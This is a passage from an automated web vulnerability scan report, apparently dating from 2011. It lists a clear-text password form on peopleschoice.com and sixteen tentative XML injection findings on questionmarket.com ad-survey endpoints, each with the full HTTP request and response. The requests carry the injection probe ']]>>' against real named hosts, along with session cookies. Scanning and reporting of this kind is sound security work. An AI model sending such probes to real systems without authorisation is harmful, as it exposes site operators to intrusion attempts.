Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:09:44 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Content-Length: 27072
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<div id="pca-hidden-login-controls">
       <form method="post">
               <label for="username" style="display: none;">
...[SNIP]...
</label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" />    
               <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" />
...[SNIP]...

8.2. http://www.peopleschoice.com/pca/vote/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/vote/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pca/vote/ HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; __utma=61498413.1690544870.1316282695.1316282695.1316282695.1; __utmb=61498413; __utmc=61498413; __utmz=61498413.1316282695.1.1.utmccn=(referral)|utmcsr=wonderwall.msn.com|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   
   <head>
...[SNIP]...
<div id="pca-hidden-login-controls">
       <form method="post">
               <label for="username" style="display: none;">
...[SNIP]...
</label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" />    
               <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" />
...[SNIP]...

9. XML injection  previous  next
There are 16 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d913131/10/400008095899/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d913131/10/400008095899/decide.php?ord=1316288110 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:40:59 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 2686


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.2. http://amch.questionmarket.com/adsc/d913131/10/922738/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d913131/10/922738/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d913131/10/922738/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:40:38 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1306


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.3. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741102/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d924563/3/43741102/decide.php?ord=1316287959 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:39:37 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1230


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.4. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741105/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d924563/3/43741105/decide.php?ord=1316281820 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:04:06 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.5. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:41:04 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1306


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.6. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/d_layer.php]]>>?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:41:05 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1306


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/dynamiclink.js.php]]>>?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:49:00 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1300


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.8. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/st.php?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:04:23 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.9. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>>?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:04:24 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.10. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/sta.php?survey_num=913131&site=161611318102790930&code=8095899&ut_sys=mplx HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:42:47 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 2686


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.11. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/sta.php]]>>?survey_num=913131&site=161611318102790930&code=8095899&ut_sys=mplx HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:42:49 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 2686


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.12. http://amch.questionmarket.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:43:14 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.13. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /surveyf]]>>/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
